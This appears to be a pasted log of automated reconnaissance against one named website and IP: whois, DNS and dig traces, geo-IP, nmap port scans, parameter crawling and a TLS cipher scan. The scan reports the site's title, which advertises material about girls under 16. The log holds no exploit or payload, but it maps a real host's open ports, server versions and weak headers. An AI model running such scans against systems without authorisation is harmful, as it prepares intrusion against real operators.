Oct 06, 2019, 05:12 AM
1######################################################################################################################################
2=======================================================================================================================================
3Hostname www.ygmt.info ISP Host Sailor Ltd.
4Continent Europe Flag
5NL
6Country Netherlands Country Code NL
7Region North Holland Local time 06 Oct 2019 05:17 CEST
8City Amsterdam Postal Code 1091
9IP Address 185.82.200.52 Latitude 52.35
10 Longitude 4.917
11======================================================================================================================================
12#######################################################################################################################################
13> www.ygmt.info
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.ygmt.info
19Address: 185.82.200.52
20>
21#######################################################################################################################################
22[+] Target : www.ygmt.info
23
24[+] IP Address : 185.82.200.52
25
26[+] Headers :
27
28[+] Date : Sun, 06 Oct 2019 03:23:56 GMT
29[+] Server : Apache/2.4.10 (Debian)
30[+] Last-Modified : Wed, 13 Mar 2019 00:18:15 GMT
31[+] ETag : "a0d-583eebde65fc0-gzip"
32[+] Accept-Ranges : bytes
33[+] Vary : Accept-Encoding
34[+] Content-Encoding : gzip
35[+] Content-Length : 1379
36[+] Keep-Alive : timeout=5, max=100
37[+] Connection : Keep-Alive
38[+] Content-Type : text/html
39
40[+] SSL Certificate Information :
41
42[+] organizationalUnitName : PositiveSSL
43[+] commonName : ygmt.info
44[+] countryName : GB
45[+] stateOrProvinceName : Greater Manchester
46[+] localityName : Salford
47[+] organizationName : COMODO CA Limited
48[+] commonName : COMODO RSA Domain Validation Secure Server CA
49[+] Version : 3
50[+] Serial Number : FD0AC3A33FCAF37C66E222C7581E08CC
51[+] Not Before : Feb 14 00:00:00 2017 GMT
52[+] Not After : Feb 14 23:59:59 2018 GMT
53[+] OCSP : ('http://ocsp.comodoca.com',)
54[+] subject Alt Name : (('DNS', 'ygmt.info'), ('DNS', 'www.ygmt.info'))
55[+] CA Issuers : ('http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt',)
56[+] CRL Distribution Points : ('http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl',)
57
58[+] Whois Lookup :
59
60[+] NIR : None
61[+] ASN Registry : ripencc
62[+] ASN : 60117
63[+] ASN CIDR : 185.82.200.0/24
64[+] ASN Country Code : NL
65[+] ASN Date : 2014-12-31
66[+] ASN Description : HS, AE
67[+] cidr : 185.82.200.0/24
68[+] name : EU-HOSTSAILOR-20150101
69[+] handle : AF11712-RIPE
70[+] range : 185.82.200.0 - 185.82.200.255
71[+] description : HostSailor NL Services
72[+] country : NL
73[+] state : None
74[+] city : None
75[+] address : Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area
76Dubai P.O. Box 98362
77United Arab Emirates
78[+] postal_code : None
79[+] emails : None
80[+] created : 2015-01-01T11:31:29Z
81[+] updated : 2015-01-01T11:31:29Z
82
83[+] Crawling Target...
84
85[+] Looking for robots.txt........[ Not Found ]
86[+] Looking for sitemap.xml.......[ Not Found ]
87[+] Extracting CSS Links..........[ 0 ]
88[+] Extracting Javascript Links...[ 0 ]
89[+] Extracting Internal Links.....[ 0 ]
90[+] Extracting External Links.....[ 0 ]
91[+] Extracting Images.............[ 0 ]
92
93[+] Total Links Extracted : 0
94
95[+] Completed!
96#######################################################################################################################################
97[+] Starting At 2019-10-05 23:24:26.164428
98[+] Collecting Information On: http://www.ygmt.info/top50/index.php?method=in
99[#] Status: 200
100--------------------------------------------------
101[#] Web Server Detected: Apache/2.4.10 (Debian)
102[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
103- Date: Sun, 06 Oct 2019 03:24:23 GMT
104- Server: Apache/2.4.10 (Debian)
105- Vary: Accept-Encoding
106- Content-Encoding: gzip
107- Content-Length: 9486
108- Keep-Alive: timeout=5, max=100
109- Connection: Keep-Alive
110- Content-Type: text/html; charset=UTF-8
111--------------------------------------------------
112[#] Finding Location..!
113[#] as: AS60117 Host Sailor Ltd.
114[#] city: Amsterdam
115[#] country: Netherlands
116[#] countryCode: NL
117[#] isp: EU-HOSTSAILOR
118[#] lat: 52.35
119[#] lon: 4.9167
120[#] org: HostSailor NL Services
121[#] query: 185.82.200.52
122[#] region: NH
123[#] regionName: North Holland
124[#] status: success
125[#] timezone: Europe/Amsterdam
126[#] zip: 1091
127--------------------------------------------------
128[x] Didn't Detect WAF Presence on: http://www.ygmt.info/top50/index.php?method=in
129--------------------------------------------------
130[#] Starting Reverse DNS
131[-] Failed ! Fail
132--------------------------------------------------
133[!] Scanning Open Port
134[#] 22/tcp open ssh
135[#] 80/tcp open http
136[#] 443/tcp open https
137[#] 10000/tcp open snet-sensor-mgmt
138--------------------------------------------------
139[+] Collecting Information Disclosure!
140[#] Detecting sitemap.xml file
141[-] sitemap.xml file not Found!
142[#] Detecting robots.txt file
143[-] robots.txt file not Found!?
144[#] Detecting GNU Mailman
145[-] GNU Mailman App Not Detected!?
146--------------------------------------------------
147[+] Crawling Url Parameter On: http://www.ygmt.info/top50/index.php?method=in
148--------------------------------------------------
149[#] Searching Html Form !
150[+] Html Form Discovered
151[#] action: index.php
152[#] class: None
153[#] id: None
154[#] method: get
155--------------------------------------------------
156[-] No DOM Paramter Found!?
157--------------------------------------------------
158[!] 113 Internal Dynamic Parameter Discovered
272--------------------------------------------------
273[!] 23 External Dynamic Parameter Discovered
297--------------------------------------------------
298[!] 5 Internal links Discovered
299[+] https://www.ygmt.info/
300[+] http://www.ygmt.info/top50/skins/photo50/screen.css
301[+] http://www.ygmt.info/top50/feed.php
302[+] http://www.ygmt.info/top50/
303[+] http://www.ygmt.info/top50/
304--------------------------------------------------
305[!] 69 External links Discovered
375--------------------------------------------------
376[#] Mapping Subdomain..
377[!] Found 2 Subdomain
378- ygmt.info
379- www.ygmt.info
380--------------------------------------------------
381[!] Done At 2019-10-05 23:24:39.075700
382#######################################################################################################################################
383[INFO] ------TARGET info------
384[*] TARGET: http://www.ygmt.info/top50/index.php?method=in
385[*] TARGET IP: 185.82.200.52
386[INFO] NO load balancer detected for www.ygmt.info...
387[*] DNS servers: freedns1.registrar-servers.com.
388[*] TARGET server: Apache/2.4.10 (Debian)
389[*] CC: NL
390[*] Country: Netherlands
391[*] RegionCode: NH
392[*] RegionName: North Holland
393[*] City: Amsterdam
394[*] ASN: AS60117
395[*] BGP_PREFIX: 185.82.200.0/24
396[*] ISP: HS Host Sailor Ltd., AE
397[INFO] DNS enumeration:
398[INFO] Possible abuse mails are:
399[*] abuse@hostsailor.com
400[*] abuse@www.ygmt.info
401[*] abuse@ygmt.info
402[INFO] NO PAC (Proxy Auto Configuration) file FOUND
403[INFO] Checking for HTTP status codes recursively from /top50/index.php?method=in
404[INFO] Status code Folders
405[*] 200 http://www.ygmt.info/top50/
406[INFO] Starting FUZZing in http://www.ygmt.info/FUzZzZzZzZz...
407[INFO] Status code Folders
408[ALERT] Look in the source code. It may contain passwords
409[INFO] Links found from http://www.ygmt.info/top50/index.php?method=in http://185.82.200.52/:
593[INFO] GOOGLE has 497,000 results (0.15 seconds) about http://www.ygmt.info/
594[INFO] Shodan detected the following opened ports on 185.82.200.52:
595[*] 10000
596[*] 22
597[*] 443
598[*] 80
599[INFO] ------VirusTotal SECTION------
600[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
601[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
602[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
603[INFO] ------Alexa Rank SECTION------
604[INFO] Percent of Visitors Rank in Country:
605[INFO] Percent of Search Traffic:
606[INFO] Percent of Unique Visits:
607[INFO] Total Sites Linking In:
608[*] Total Sites
609[INFO] Useful links related to www.ygmt.info - 185.82.200.52:
623[INFO] Useful links related to AS60117 - 185.82.200.0/24:
624[*] http://www.google.com/safebrowsing/diagnostic?site=AS:60117
625[*] https://www.senderbase.org/lookup/?search_string=185.82.200.0/24
626[*] http://bgp.he.net/AS60117
627[*] https://stat.ripe.net/AS60117
628[INFO] Date: 05/10/19 | Time: 23:30:39
629[INFO] Total time: 1 minute(s) and 27 second(s)
630######################################################################################################################################
631[i] Scanning Site: http://www.ygmt.info
632
633
634
635B A S I C I N F O
636====================
637
638
639[+] Site Title: Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models
640[+] IP address: 185.82.200.52
641[+] Web Server: Apache/2.4.10 (Debian)
642[+] CMS: Could Not Detect
643[+] Cloudflare: Not Detected
644[+] Robots File: Could NOT Find robots.txt!
645
646
647
648
649W H O I S L O O K U P
650========================
651
652 Domain Name: YGMT.INFO
653Registry Domain ID: D38820258-LRMS
654Registrar WHOIS Server: whois.1and1.com
655Registrar URL: http://registrar.1and1.info
656Updated Date: 2019-09-08T20:45:14Z
657Creation Date: 2011-07-08T14:47:10Z
658Registry Expiry Date: 2020-07-08T14:47:10Z
659Registrar Registration Expiration Date:
660Registrar: 1&1 IONOS SE
661Registrar IANA ID: 83
662Registrar Abuse Contact Email: abuse@1and1.com
663Registrar Abuse Contact Phone: +1.8774612631
664Reseller:
665Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
666Registrant Organization: Data Privacy Protected
667Registrant State/Province: BW
668Registrant Country: DE
669Name Server: FREEDNS1.REGISTRAR-SERVERS.COM
670Name Server: FREEDNS2.REGISTRAR-SERVERS.COM
671Name Server: FREEDNS3.REGISTRAR-SERVERS.COM
672Name Server: FREEDNS4.REGISTRAR-SERVERS.COM
673Name Server: FREEDNS5.REGISTRAR-SERVERS.COM
674DNSSEC: unsigned
675URL of the ICANN Whois Inaccuracy Complaint Form is https://www.icann.org/wicf/
676>>> Last update of WHOIS database: 2019-10-06T03:23:16Z <<<
677
678For more information on Whois status codes, please visit https://icann.org/epp
679
680
681
682
683
684G E O I P L O O K U P
685=========================
686
687[i] IP Address: 185.82.200.52
688[i] Country: Netherlands
689[i] State: North Holland
690[i] City: Amsterdam
691[i] Latitude: 52.35
692[i] Longitude: 4.9167
693
694
695
696
697H T T P H E A D E R S
698=======================
699
700
701[i] HTTP/1.1 200 OK
702[i] Date: Sun, 06 Oct 2019 03:24:18 GMT
703[i] Server: Apache/2.4.10 (Debian)
704[i] Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
705[i] ETag: "a0d-583eebde65fc0"
706[i] Accept-Ranges: bytes
707[i] Content-Length: 2573
708[i] Vary: Accept-Encoding
709[i] Connection: close
710[i] Content-Type: text/html
711
712
713
714
715D N S L O O K U P
716===================
717
718ygmt.info. 1799 IN A 185.82.200.52
719ygmt.info. 1799 IN NS freedns1.registrar-servers.com.
720ygmt.info. 1799 IN NS freedns2.registrar-servers.com.
721ygmt.info. 1799 IN NS freedns3.registrar-servers.com.
722ygmt.info. 1799 IN NS freedns4.registrar-servers.com.
723ygmt.info. 1799 IN NS freedns5.registrar-servers.com.
724ygmt.info. 3600 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
725
726
727
728
729S U B N E T C A L C U L A T I O N
730====================================
731
732Address = 185.82.200.52
733Network = 185.82.200.52 / 32
734Netmask = 255.255.255.255
735Broadcast = not needed on Point-to-Point links
736Wildcard Mask = 0.0.0.0
737Hosts Bits = 0
738Max. Hosts = 1 (2^0 - 0)
739Host Range = { 185.82.200.52 - 185.82.200.52 }
740
741
742
743N M A P P O R T S C A N
744============================
745
746Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-06 03:24 UTC
747Nmap scan report for ygmt.info (185.82.200.52)
748Host is up (0.077s latency).
749rDNS record for 185.82.200.52: latina.petite.guru
750
751PORT STATE SERVICE
75221/tcp closed ftp
75322/tcp open ssh
75423/tcp closed telnet
75580/tcp open http
756110/tcp closed pop3
757143/tcp closed imap
758443/tcp open https
7593389/tcp closed ms-wbt-server
760
761Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
762
763
764
765S U B - D O M A I N F I N D E R
766==================================
767
768
769[i] Total Subdomains Found : 1
770
771[+] Subdomain: www.ygmt.info
772[-] IP: 185.82.200.52
773######################################################################################################################################
774Enter Address Website = www.ygmt.info
775
776
777
778Reversing IP With HackTarget 'www.ygmt.info'
779-----------------------------------------------
780
813[+] youth-and-beauty.net
814
815
816
817Reverse IP With YouGetSignal 'www.ygmt.info'
818-----------------------------------------------
819
820[*] IP: 185.82.200.52
821[*] Domain: ygmt.info
822[*] Total Domains: 1
823
824[+] ygmt.info
825
826
827
828Geo IP Lookup 'www.ygmt.info'
829--------------------------------
830
831[+] IP Address: 185.82.200.52
832[+] Country: Netherlands
833[+] State: North Holland
834[+] City: Amsterdam
835[+] Latitude: 52.35
836[+] Longitude: 4.9167
837
838
839
840Whois 'www.ygmt.info'
841------------------------
842
843[+] Domain Name: YGMT.INFO
844[+] Registry Domain ID: D38820258-LRMS
845[+] Registrar WHOIS Server: whois.1and1.com
846[+] Registrar URL: http://registrar.1and1.info
847[+] Updated Date: 2019-09-08T20:45:14Z
848[+] Creation Date: 2011-07-08T14:47:10Z
849[+] Registry Expiry Date: 2020-07-08T14:47:10Z
850[+] Registrar Registration Expiration Date:
851[+] Registrar: 1&1 IONOS SE
852[+] Registrar IANA ID: 83
853[+] Registrar Abuse Contact Email: abuse@1and1.com
854[+] Registrar Abuse Contact Phone: +1.8774612631
855[+] Reseller:
856[+] Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
857[+] Registrant Organization: Data Privacy Protected
858[+] Registrant State/Province: BW
859[+] Registrant Country: DE
860[+] Name Server: FREEDNS1.REGISTRAR-SERVERS.COM
861[+] Name Server: FREEDNS2.REGISTRAR-SERVERS.COM
862[+] Name Server: FREEDNS3.REGISTRAR-SERVERS.COM
863[+] Name Server: FREEDNS4.REGISTRAR-SERVERS.COM
864[+] Name Server: FREEDNS5.REGISTRAR-SERVERS.COM
865[+] DNSSEC: unsigned
866[+] URL of the ICANN Whois Inaccuracy Complaint Form is https://www.icann.org/wicf/
867[+] >>> Last update of WHOIS database: 2019-10-06T03:23:42Z <<<
868[+] For more information on Whois status codes, please visit https://icann.org/epp
869
870
871
872DNS Lookup 'www.ygmt.info'
873-----------------------------
874
875[+] ygmt.info. 1799 IN A 185.82.200.52
876[+] ygmt.info. 1799 IN NS freedns1.registrar-servers.com.
877[+] ygmt.info. 1799 IN NS freedns2.registrar-servers.com.
878[+] ygmt.info. 1799 IN NS freedns3.registrar-servers.com.
879[+] ygmt.info. 1799 IN NS freedns4.registrar-servers.com.
880[+] ygmt.info. 1799 IN NS freedns5.registrar-servers.com.
881[+] ygmt.info. 3600 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
882
883
884
885Find Shared DNS 'www.ygmt.info'
886----------------------------------
887
888[+] No DNS server records found for ygmt.info
889
890
891
892Show HTTP Header 'www.ygmt.info'
893-----------------------------------
894
895[+] HTTP/1.1 200 OK
896[+] Date: Sun, 06 Oct 2019 03:25:09 GMT
897[+] Server: Apache/2.4.10 (Debian)
898[+] Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
899[+] ETag: "a0d-583eebde65fc0"
900[+] Accept-Ranges: bytes
901[+] Content-Length: 2573
902[+] Vary: Accept-Encoding
903[+] Content-Type: text/html
904[+]
905
906
907
908Port Scan 'www.ygmt.info'
909----------------------------
910
911Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-06 03:25 UTC
912Nmap scan report for www.ygmt.info (185.82.200.52)
913Host is up (0.080s latency).
914rDNS record for 185.82.200.52: latina.petite.guru
915
916PORT STATE SERVICE
91721/tcp closed ftp
91822/tcp open ssh
91923/tcp closed telnet
92080/tcp open http
921110/tcp closed pop3
922143/tcp closed imap
923443/tcp open https
9243389/tcp closed ms-wbt-server
925
926Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
927
928
929
930
931
932Traceroute 'www.ygmt.info'
933-----------------------------
934
935Start: 2019-10-06T03:25:15+0000
936HOST: web01 Loss% Snt Last Avg Best Wrst StDev
937 1.|-- 45.79.12.201 0.0% 3 0.7 0.7 0.6 0.7 0.0
938 2.|-- 45.79.12.0 0.0% 3 0.6 0.7 0.6 0.9 0.2
939 3.|-- 45.79.12.9 0.0% 3 0.7 7.5 0.5 21.2 11.9
940 4.|-- 199.245.16.65 0.0% 3 1.8 1.7 1.4 1.8 0.2
941 5.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
942 6.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
943 7.|-- WORLDSTREAM.ear4.Amsterdam1.Level3.net 0.0% 3 112.2 112.2 112.2 112.2 0.0
944 8.|-- 109.236.95.185 0.0% 3 117.3 117.3 117.3 117.3 0.0
945 9.|-- 190.2.158.155 0.0% 3 112.0 111.9 111.9 112.0 0.0
946 10.|-- 185.106.120.66 0.0% 3 116.8 116.9 116.8 116.9 0.1
947 11.|-- latina.petite.guru 0.0% 3 116.4 116.4 116.4 116.4 0.0
948######################################################################################################################################
949;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61022
950;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 5, ADDITIONAL: 5
951
952;; QUESTION SECTION:
953;ygmt.info. IN ANY
954
955;; ANSWER SECTION:
956ygmt.info. 3601 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
957ygmt.info. 1800 IN A 185.82.200.52
958ygmt.info. 1800 IN NS freedns4.registrar-servers.com.
959ygmt.info. 1800 IN NS freedns1.registrar-servers.com.
960ygmt.info. 1800 IN NS freedns2.registrar-servers.com.
961ygmt.info. 1800 IN NS freedns5.registrar-servers.com.
962ygmt.info. 1800 IN NS freedns3.registrar-servers.com.
963
964;; AUTHORITY SECTION:
965ygmt.info. 1800 IN NS freedns3.registrar-servers.com.
966ygmt.info. 1800 IN NS freedns2.registrar-servers.com.
967ygmt.info. 1800 IN NS freedns4.registrar-servers.com.
968ygmt.info. 1800 IN NS freedns1.registrar-servers.com.
969ygmt.info. 1800 IN NS freedns5.registrar-servers.com.
970
971;; ADDITIONAL SECTION:
972freedns1.registrar-servers.com. 25231 IN A 45.58.122.82
973freedns2.registrar-servers.com. 25231 IN A 104.216.69.250
974freedns3.registrar-servers.com. 42360 IN A 195.154.94.174
975freedns4.registrar-servers.com. 677 IN A 95.141.37.127
976freedns5.registrar-servers.com. 677 IN A 54.36.109.15
977
978Received 376 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 90 ms
979######################################################################################################################################
980 <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace ygmt.info
981;; global options: +cmd
982. 82302 IN NS m.root-servers.net.
983. 82302 IN NS d.root-servers.net.
984. 82302 IN NS k.root-servers.net.
985. 82302 IN NS l.root-servers.net.
986. 82302 IN NS j.root-servers.net.
987. 82302 IN NS g.root-servers.net.
988. 82302 IN NS f.root-servers.net.
989. 82302 IN NS a.root-servers.net.
990. 82302 IN NS c.root-servers.net.
991. 82302 IN NS i.root-servers.net.
992. 82302 IN NS e.root-servers.net.
993. 82302 IN NS b.root-servers.net.
994. 82302 IN NS h.root-servers.net.
995. 82302 IN RRSIG NS 8 0 518400 20191018170000 20191005160000 22545 . s9jzg4vhpn/0jz/+2KSoxxtpNWBsxDL291IT6bgNJkqPySat+/z9/pRU 7WUgRXYn6HJNi/dUd5YB9qcXHZMlzPTsVPJ3P6vWtpUs14y44LCoqCUM FtCt7+Jzl7CZukiaBm+humJRicPAQ5jxjmCVETCJPj6eTww3rhFBwtz2 hSrAsQNMVPKF/wq/TINfYPeiqiClqUhNjc3mzlJ0xUXiGB3xiHDyxn0i fbEULSFqHH3oJbrfo/U1E9lhwo0vzEADgHndKEWKlj9zPbjJMSzWrczX j1i2CIWimSiKWRjpm52oG4sW5TN96dXmiRkZ4fQYCrrSG/3rOsz/ZUBP +YOl+A==
996;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 40 ms
997
998info. 172800 IN NS b2.info.afilias-nst.org.
999info. 172800 IN NS d0.info.afilias-nst.org.
1000info. 172800 IN NS a2.info.afilias-nst.info.
1001info. 172800 IN NS a0.info.afilias-nst.info.
1002info. 172800 IN NS b0.info.afilias-nst.org.
1003info. 172800 IN NS c0.info.afilias-nst.info.
1004info. 86400 IN DS 8674 7 1 197789A2CBABA6FECD0B5AC88C5BC414CE1FC309
1005info. 86400 IN DS 8674 7 2 EC9B6082B96B5F87143696F2B483ACC9B2C433DCE0C94E70F1FF5648 CA18008B
1006info. 86400 IN RRSIG DS 8 1 86400 20191018170000 20191005160000 22545 . QEmrL6ABrDMe2Sweq1BBm3L7uQynQAao+vhiGNYt1xvi4nszIuupa7Eg boK5haMRlM558+DD7CRvhtLNo0NTBos0dYnrc9VkzEQyRtVD1a11K5Ug fiaFyr9gtZI+Rzg7Aqg7bbhKqTB0cdPBEvi7lKGUixRfPAj3UiH4JO18 j4yibiPUaq+cuBZkqw/2S+v/rHBG8Kf0y9R9gNovPaTOzAyAAz2l54lc co9/pQsjSnQIb83c8cq7CvIplwBkyPJ8fCvHvXzEwn3QTtKk209YBfpI tct3CVO57IIo86Wfui5xL8Bz9XHcfQS/ufgRYN82zzyrNDRpRgn6hsbO p/yYPQ==
1007;; Received 812 bytes from 202.12.27.33#53(m.root-servers.net) in 234 ms
1008
1009ygmt.info. 86400 IN NS freedns1.registrar-servers.com.
1010ygmt.info. 86400 IN NS freedns2.registrar-servers.com.
1011ygmt.info. 86400 IN NS freedns3.registrar-servers.com.
1012ygmt.info. 86400 IN NS freedns4.registrar-servers.com.
1013ygmt.info. 86400 IN NS freedns5.registrar-servers.com.
1014adnsd9nk7nk82he8h21rj0jjhj11o5gb.info. 3600 IN NSEC3 1 1 1 D399EAAB ADNVG6B2JJN9MIEU7DJB24BL7RG5MDPI NS SOA RRSIG DNSKEY NSEC3PARAM
1015adnsd9nk7nk82he8h21rj0jjhj11o5gb.info. 3600 IN RRSIG NSEC3 7 2 3600 20191027040239 20191006030239 4514 info. J9QhgwuDEGlMzu8v9A88wQpTsoMW60Cu4hO6aVDQak/EX7j0jZGZpAKl tdW+DuCEq/hDqgBP2E6iyEONDolBNTwPOIV5LYEUnsimWDg2b3BjWigd wvqtEK162QzW8puqP7hJHw/BqxcmCdlF8CrtgbOJsD3MxBQ8ra+VVnaO ync=
1016dd2jv9hj90psq8mbklcqs59d3q11ngn4.info. 3600 IN NSEC3 1 1 1 D399EAAB DD2P6FLTIF5QC3OE7G94FBDJD8R6K774
1017dd2jv9hj90psq8mbklcqs59d3q11ngn4.info. 3600 IN RRSIG NSEC3 7 2 3600 20191022152843 20191001142843 4514 info. ChzNmreP2hFC6tgy0d/1C9Bvf9mfPIdevJEgQA8BFdZ9xgX0EY4K2yC1 271WzBEIBoSV559CExavt4fFoYNIYm3Za0k+1Sj3W47HTcseva1lJ+fZ sSjH8mkkFwAMzsHsbBA72pLli8uVYkzkncBsxVmXsIQEp+DhLlDMR+uo Ves=
1018;; Received 661 bytes from 2001:500:41::1#53(a2.info.afilias-nst.info) in 30 ms
1019
1020ygmt.info. 1800 IN A 185.82.200.52
1021;; Received 54 bytes from 95.141.37.127#53(freedns4.registrar-servers.com) in 145 ms
1022
1023######################################################################################################################################
1024[*] Performing General Enumeration of Domain: ygmt.info
1025[-] DNSSEC is not configured for ygmt.info
1026[*] SOA freedns1.registrar-servers.com 45.58.122.82
1027[*] NS freedns2.registrar-servers.com 104.216.69.250
1028[*] NS freedns5.registrar-servers.com 54.36.109.15
1029[*] NS freedns3.registrar-servers.com 195.154.94.174
1030[*] NS freedns4.registrar-servers.com 95.141.37.127
1031[*] NS freedns1.registrar-servers.com 45.58.122.82
1032[-] Could not Resolve MX Records for ygmt.info
1033[*] A ygmt.info 185.82.200.52
1034[*] Enumerating SRV Records
1035[-] No SRV Records Found for ygmt.info
1036[+] 0 Records Found
1037######################################################################################################################################
1038
1039 AVAILABLE PLUGINS
1040 -----------------
1041
1042 RobotPlugin
1043 OpenSslCipherSuitesPlugin
1044 HttpHeadersPlugin
1045 CompressionPlugin
1046 FallbackScsvPlugin
1047 SessionRenegotiationPlugin
1048 OpenSslCcsInjectionPlugin
1049 SessionResumptionPlugin
1050 EarlyDataPlugin
1051 HeartbleedPlugin
1052 CertificateInfoPlugin
1053
1054
1055
1056 CHECKING HOST(S) AVAILABILITY
1057 -----------------------------
1058
1059 185.82.200.52:443 => 185.82.200.52
1060
1061
1062
1063
1064 SCAN RESULTS FOR 185.82.200.52:443 - 185.82.200.52
1065 --------------------------------------------------
1066
1067 * TLSV1_1 Cipher Suites:
1068 Forward Secrecy OK - Supported
1069 RC4 OK - Not Supported
1070
1071 Preferred:
1072 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1073 Accepted:
1074 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1075 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1076 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1077 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1078 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1079 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1080 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1081 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1082 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1083 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1084
1085 * TLSV1 Cipher Suites:
1086 Forward Secrecy OK - Supported
1087 RC4 OK - Not Supported
1088
1089 Preferred:
1090 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1091 Accepted:
1092 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1093 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1094 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1095 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1096 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1097 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1098 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1099 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1100 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1101 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1102
1103 * Downgrade Attacks:
1104 TLS_FALLBACK_SCSV: OK - Supported
1105
1106 * Deflate Compression:
1107 OK - Compression disabled
1108
1109 * TLS 1.2 Session Resumption Support:
1110 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1111 With TLS Tickets: OK - Supported
1112
1113 * TLSV1_2 Cipher Suites:
1114 Forward Secrecy OK - Supported
1115 RC4 OK - Not Supported
1116
1117 Preferred:
1118 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1119 Accepted:
1120 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1121 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1122 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1123 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1124 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1125 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
1126 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1127 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1129 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1130 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1131 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1132 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1133 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1134 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1135 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1136 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1137 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1138
1139 * Certificate Information:
1140 Content
1141 SHA1 Fingerprint: c46e6ea4c40d22da6302a416b68bf8a890b8f667
1142 Common Name: ygmt.info
1143 Issuer: COMODO RSA Domain Validation Secure Server CA
1144 Serial Number: 336350573905975174485940211738784696524
1145 Not Before: 2017-02-14 00:00:00
1146 Not After: 2018-02-14 23:59:59
1147 Signature Algorithm: sha256
1148 Public Key Algorithm: RSA
1149 Key Size: 2048
1150 Exponent: 65537 (0x10001)
1151 DNS Subject Alternative Names: ['ygmt.info', 'www.ygmt.info']
1152
1153 Trust
1154 Hostname Validation: FAILED - Certificate does NOT match 185.82.200.52
